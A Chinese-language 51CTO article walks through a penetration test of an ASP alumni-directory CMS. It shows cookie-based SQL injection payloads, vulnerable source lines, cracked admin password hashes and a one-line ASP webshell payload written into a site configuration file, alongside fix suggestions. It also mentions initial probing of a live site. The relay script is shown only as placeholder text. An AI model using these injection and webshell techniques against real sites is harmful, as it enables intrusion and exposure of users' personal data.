【51CTO.com 獨家特稿】幾乎每個公司或團(tuán)體都會建立自己的網(wǎng)站，但由于各種原因，大部分人會使用網(wǎng)上 公 布的一些CMS來構(gòu)建自己的網(wǎng) 站，但卻很少有人會關(guān)注自己使用的CMS是否安全。下面存在漏洞的校友錄就是一個 很好的例子，攻破后，校友的個人信息將全部泄露。

一、對某CMS的初步安檢

1.初步查看
某日，在安天365群里，同伴發(fā)過來一個網(wǎng)址，讓我友情檢測一下該網(wǎng)站的 安全，打開后感覺 人氣還不錯，界面也比較簡潔 。如圖1所示。

圖1

2.簡單的安全測試
打開網(wǎng)站一看原來是個校友錄，隨便找個帶參數(shù)的地方，加個單引 號，http://www.*********.com/gg.asp?id=100'， 返回的 結(jié)果如圖2所示。

圖2

很明顯，程序做了防注入的處理，看來程序開發(fā)者還有點安全意識，做了一些安全措施，不過后來證明，防注 入也 只是檢測了GET方法，并 未對POST和COOKIE做檢測。正準(zhǔn)備測試cookie注入，同伴kiss傳了個源代碼過來， 有源代碼就 好辦了，還是在本地測試安全，網(wǎng)上的畢竟是未 經(jīng)授權(quán)的安全檢測，多少存在一些風(fēng)險。
#p#
二、在本地進(jìn)行安全測試

1.搭建測試環(huán)境
把校友錄的源代碼復(fù)制到IIS的web目錄下，打開瀏覽器瀏覽http://192.168.1.5/txl/，結(jié)果如圖3所示。

圖3

2.安裝組件
很顯示，我本地服務(wù)器不支持它的組件，先看說明。在安裝說明里有這么 一句“組件安裝方法 ，將 該組件復(fù)制到 C:\WINDOWS\system32里，并將此權(quán)限設(shè)置成允許網(wǎng)站訪問組的“完全 控制權(quán)限”。例：將 everyone設(shè)置 成“完全控制”。然后在“開始/運行 ”中輸入‘regsvr32 yvsy.dll’，卸 載方式為‘regsvr32 yvsy.dll -u’”。照 著它的方法注冊了組件，如圖4所示。

圖4

3.搭建試驗環(huán)境成功
注冊成功后，再次瀏覽http://192.168.1.5/txl/，一切正常了，后面 開始檢測該CMS的安全漏 洞。如圖5所示。

圖5

#p#
三、挖掘并查找安全漏洞

1.解密CMS源代碼
使用Editplus編輯器打開CMS下的源代碼，發(fā)現(xiàn)程序作者對部分源代 碼使用了Encoder加密，如圖6所示。

圖6

2.解密源代碼
為了方便查看源代碼，首先對它們進(jìn)行解密，到網(wǎng)上下載asp腳本解密工 具，打開，選擇源代碼所 在目錄，如圖7所示。

圖7

點擊“開始解密”，幾秒鐘后就可以對文件夾下所有asp文件解密。解密后的代碼如圖8所示。

圖8

說明：
（1）其實，使用Encoder對asp腳本加密沒什么必要，因為對于asp腳本解密太簡單了，于其花時間 在加密 腳本上，不如將時間花在寫更安全的代碼上。

（2）什么是Encoder加密？
Asp Encoder是微軟推出的一套算法，并提供了一個命令行下的腳本加密工具 。 Script Encoder的特點是：它只加密頁面中嵌入的腳本代碼，其他部分，如HTML的TAG仍然保持原樣不變。處 理后的文件 中被加密過的部分為只讀內(nèi)容，對加密部分的任何修改都將導(dǎo)致 整個加密后的文件不能使用。 Script Encoder加密過的 ASP文件還將使Script Debugger之類的腳本調(diào)試工具失效。

3.查找SQL注入點
因為代碼還挺多的，不想一個個看，所以通過正則表達(dá)式來查找可能 存在注入的文件，之后再 慢慢看。打開EditPlus,點擊“搜索”->“在文件中查找”，彈出的對話框，查找內(nèi) 容填寫 “((select|update|delete)+.*(from|set)+.*(where)+.*)”，文件類型填寫“*.asp”，文件夾選擇校 友錄所在的文件 夾，再把“包含了文件夾”和“正則表達(dá)式”選項選上，如圖9所示。

圖9

此正則表達(dá)式的意思是查找文件夾下所有的asp文件，如果包含select、update和delete這些SQL語句，就顯示 出來。 只花了一秒鐘，結(jié)果出來了，有68個文件使用到SQL語句，如圖10所示。

圖10

圖10 查詢結(jié)果

說明：
在編寫處理字符串的程序或網(wǎng)頁時，經(jīng)常會有查找符合某些復(fù)雜規(guī) 則的字 符串的需要。正則表達(dá)式就是用于描述這些規(guī)則的工具。換句話說，正則表達(dá)式就是記錄文本規(guī)則的代碼 。很可能你使 用過Windows/Dos下用于文件查找的通配符(wildcard)，也就是*和?。如果你想查找某個目錄下的 所有的Word文檔的話， 你會搜索*.doc。在這里，*會被解釋成任意的字符串。和通配符類似，正則表達(dá)式也是用 來進(jìn)行文本匹配的工具，只不 過比起通配符，它能更精確地描述你的需求——當(dāng)然，代價就是更復(fù)雜——比如你 可以編寫一個正則表達(dá)式，用來查找 所有以0開頭，后面跟著2-3個數(shù)字，然后是一個連字號“-”，最后是7或8 位數(shù)字的字符串(像010-12345678或0376- 7654321)。

4.初審代碼

（1）查看app.asp文件源代碼
在查詢結(jié)果中先查看app.asp文件，如圖11所示。

圖11

第二行bid=clng(request("bid"))把bid的值轉(zhuǎn)為Long子類型，如果request的值不為數(shù)字，則會出現(xiàn)錯誤。如 圖12所 示。CLng 函數(shù)可返回表達(dá)式，此表達(dá)式已被轉(zhuǎn)換為 Long 子類型的 Variant。

圖12

注意：值的范圍必須是在-2147483648 和 2147483647之間。

（2）分析bbsadd.asp文件
于是繼續(xù)分析下一個文件，bbsadd.asp文件，第406-409行：

406 < %repquote=request("repquote")

407 if repquote<>"" then

408 rs.open "select userid,cantent from [bbs] where id="&repquote&"",conn,1,1

409 reContent=obj.GetReContent(rs("cantent"))

圖13

再加個單引號http://192.168.1.4/txl/bbsadd.asp? aid=2&bid=3&action=reply&repquote=2'返回圖2一樣防注入的頁面，我在源代碼中一直找不到 防注的 代碼，應(yīng)該是存在它的組件中?？此茮]有辦法注入了，但我們還有POST和COOKIE注入沒有試，先試POST方 法，直 接把URL 放到pangolin里，選擇POST，在高級選項里讀取cookie,點檢測，一會，結(jié)果就出來了，如圖14 所示。

圖14

pangolin別看它是英文界面，它可是國人ZwelL寫的一款Windows平臺下的自動化SQL注入滲透測試工具。他實 現(xiàn)了 從檢測到利用完成一體化的滲透攻擊動作，盡可能的將攻擊效果最大化。

（3）測試COOKIE注入
再測試COOKIE注入，先依次在瀏覽器地址欄輸入：
http://192.168.1.4/txl/bbsadd.asp? aid=2&bid=3&action=reply&repquote=2 正常
javascript:alert (document.cookie="repquote="+escape("2 and 1=1"));
http://192.168.1.4/txl/bbsadd.asp? aid=2&bid=3&action=reply 正常
javascript:alert(document.cookie="repquote="+escape("2 and 1=2"));
http://192.168.1.4/txl/bbsadd.asp? aid=2&bid=3&action=reply 不正常，如圖15所示。

圖15

修補(bǔ)建議：把406行改為repquote =obj.regstr(request.form("repquote"))

小知識：什么是POST注入和COOKIE注入？
通常http請求不外乎 GET和POST兩種方法，也就是說如果服務(wù)端 要從客 戶端獲取參數(shù)值的話，一般是使用Request.QueryString("name")或者Request.Form("name")方法，也可 以合成 Request ("name")，一般防注入程序只是對這兩種方法提交的值作了過濾，而忽視了另外一種方法，那就 是 Request.Cookie ("name")，所以造成了COOKIE注入。

（3）繼續(xù)分析源代碼

繼續(xù)一個個文件進(jìn)行分析，其它文件沒發(fā)現(xiàn)什么問題，一直來到登錄文件login.asp?？?8-35行：

28 if request ("submi")=1 then
29 if comeurl="" Then ShowError("請在頁面里登錄")
30 xyluser=request.form ("xyluser")
31 xylpwd=md5(request.form("xylpwd"))
32 if xyluser="" or xylpwd="" Then ShowError("用 戶名和密碼不可以為空")
33 rs.open "select id,password,lastdate,logins,lastip,sitejob,sitemoney,isclose from user where 

username='"&xyluser&"'",conn,1,3
34 If Rs.eof and Rs.bof Then ShowError("你的用 戶名不存在")
35 if rs("password")<>xylpwd Then ShowError("你的密碼錯誤")

圖16

雖然不能使用POST直接注入，但可以通過一個php腳本來轉(zhuǎn)發(fā)數(shù)據(jù)包來注入，中轉(zhuǎn)腳本如下：
dddddddddddddd
ddddddddd
把此腳本放在一個支持CRUL的PHP空間上，同時還要magic_quotes_gpc = off， 如果magic_quotes_gpc = on,輸入的單引號會被轉(zhuǎn)義為“\'”，然后瀏覽http://www.n3tl04d.mil/post4.php?id=n3tl04d，如圖17所示。

圖17

把http://www.n3tl04d.mil/post4.php? id=n3tl04d放到Pangolin注入，如圖18所示。

圖18

修補(bǔ)建議：把第30行改為xyluser =obj.regstr(request.form("xyluser"))

（4）分析后臺文件adminbj.asp文件

分析后臺文件adminbj.asp文件，先看代碼
10 <%ad=request("ad")
11 type2=request("type2")
12 bjid=request("bjid")
13 Select Case type2
14 Case "edit":
……（略去無關(guān)代碼）
101 sub edit
102 sql="select * from bj where id="&bjid&""
103 rs.open sql,conn,1,1%>
很明顯，未對傳入?yún)?shù)bjid的值未做任何過濾，直接放 入 SQL語句中，

http://192.168.1.4/txl/admin/adminbj.asp?type2=edit&bjid=1，又是一個 注入， 但只能POST或COOKIE

注入，不過此此注入算是雞肋的注入，因為要登錄才能注入，沒什么實際意義。同樣的注入出現(xiàn)在后臺多個文 件了， 這里就不一一寫出來了。
#p#
四、后臺拿shell

1.猜解后臺密碼
后臺登錄有兩個密碼，這兩個密碼都存在admin表中，所以猜解admin 的表段時，需要手動添加 password2

第二個密碼的表段，使用pangolin猜解，等一會，兩個密碼都猜出來了，如圖19所示。

圖19

2.破解密碼并登錄后臺
把d42683b3df678c61和c39059a89ab77d84拿到www.cmd5.com去解密，密碼分別是admin1和admin2。拿去登錄后臺，成功。 如圖20所示。

圖20

這里不太明白，為什么開發(fā)者使用兩個登錄密碼，而兩個密碼放在同一表里，這里對安全性并沒有太大的提高 。應(yīng)該把第二個密碼使用其它加密方式單獨寫入一個asp文件中，這樣安全性不是有更大的提高？

3.插入一句話后門
查看一下siteinfo.asp文件，此文件是網(wǎng)站的一些信息配置文件，而后臺 admin/siteinfo.asp對此配置文件編輯時，并不會對表單的值進(jìn)行過濾，就給攻擊者在配置文件寫入一句話木馬 的機(jī)會。在管理后臺，點擊站點參數(shù)，在網(wǎng)址欄輸入：<%execute(request ("n"))%><%'/">http://"%><%execute(request("n"))%><%'，如圖21所示。

圖21

4.使用Lanker的Webshell連接后臺
使用lanker微型PHP+ASP管理器1.0雙用版連接http://192.168.1.4/txl/siteinfo.asp，如圖22所示，成 功獲得Webshell，之后可以上傳大馬，做進(jìn)一步提權(quán)滲透測試。

圖22

說明：
此方法會造成網(wǎng)站無法正常瀏覽，在上傳大馬后，應(yīng)及時恢復(fù)原配置文件siteinfo.asp。
#p#
五、直接拿webshell

本來這是在最前面測試的，但由于各種原因，我把它放最后。數(shù)據(jù)庫是以asp文件存在，如果使用者沒更改默 認(rèn)數(shù)據(jù)庫文件，那么就在可以輸入的地方往數(shù)據(jù)庫內(nèi)插入一句話木馬，直接得到webshell。于是查找所有文件中 包含“request.form”的文件，最后在note.asp文件中發(fā)現(xiàn)，程序未對客戶輸入的內(nèi)容做任何過濾，可以把一句 話木馬直接插入數(shù)據(jù)庫內(nèi)。

if request("type2")="add" then
rs.open "select * from note1 where userid="&session("xyluserid")&"",conn,1,3
If Rs.eof Then
rs.addnew
response.write "添加成功"
rs("userid")=session ("xyluserid")
end if
rs("content")=request.form("content") 
rs.update
rs.close
response.write "修改成功"
end if

圖23

原因是數(shù)據(jù)庫中存在nodown表，做了防下載處理，不過應(yīng)該可以突破，但本人能力有限，未能進(jìn)一步突破。

安全小知識：如何建立nodown防下載表？
首先，用notepad新建一個內(nèi)容為“<%”的文本文件，隨便起 個名字存檔。
接著，用Access打開您的數(shù)據(jù)庫文件，在最后新建一個表，隨便起個名字，在表中添加一個OLE 對象的字段，然后添加一個記錄，插入之前建立的文本文件，如果操作正確的話，應(yīng)該可以看到一個新的名為“ 數(shù)據(jù)包”的記錄。
#p#
六、總結(jié)

由于本人不懂ASP，能力有限，所以此次檢測并沒有太深入，還有一些XSS跨站攻擊和上傳等也未進(jìn)行測試，總 體來說，這套CMS的安全性還是可以的，如果管理員密碼設(shè)置復(fù)雜一些，登錄不了后臺，那也無法拿到webshell。 個人認(rèn)為在選擇CMS時，選擇一些成熟的CMS產(chǎn)品安全性會高些，同時也應(yīng)該把數(shù)據(jù)庫文件和配置文件的名稱改復(fù) 雜一些。

【51CTO.COM 獨家特稿，轉(zhuǎn)載請注明出處及作者！】

【編輯推薦】

1. 對某戶外旅游網(wǎng)站的一次安全檢測
2. 對某高級技工學(xué)校網(wǎng)站的安全檢測和加 固
3. 對韓國某手表網(wǎng)站的一次偶然安全檢測